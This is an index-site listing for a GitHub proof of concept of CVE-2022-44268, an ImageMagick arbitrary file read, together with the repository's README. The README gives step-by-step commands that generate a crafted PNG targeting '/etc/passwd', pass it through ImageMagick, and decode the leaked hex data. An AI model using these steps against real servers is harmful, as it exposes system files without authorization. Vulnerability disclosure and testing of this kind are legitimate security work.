Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/voidz0r/CVE-2022-44268
A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read
https://github.com/voidz0r/CVE-2022-44268
Last synced: about 1 month ago
JSON representation
A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read
- Host: GitHub
- URL: https://github.com/voidz0r/CVE-2022-44268
- Owner: voidz0r
- Created: 2023-02-05T18:42:27.000Z (over 1 year ago)
- Default Branch: master
- Last Pushed: 2023-02-05T19:35:03.000Z (over 1 year ago)
- Last Synced: 2024-06-06T23:43:18.093Z (3 months ago)
- Language: Rust
- Size: 934 KB
- Stars: 210
- Watchers: 2
- Forks: 28
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - voidz0r/CVE-2022-44268 - A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read (Rust)
README
# CVE-2022-44268 Arbitrary File Read PoC - PNG generator
This is a proof of concept of the ImageMagick bug discovered by https://www.metabaseq.com/imagemagick-zero-days/
Tested on ImageMagick v. 7.1.0-48 and 6.9.11-60
## How to use
### Clone the project
`git clone https://github.com/voidz0r/CVE-2022-44268`
### Run the project
`cargo run "/etc/passwd"`
### Use the file with ImageMagick
`convert image.png -resize 50% output.png`
### Analyze the resized image
`identify -verbose output.png`
### Convert hex to str
`python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a"))`
### Screens
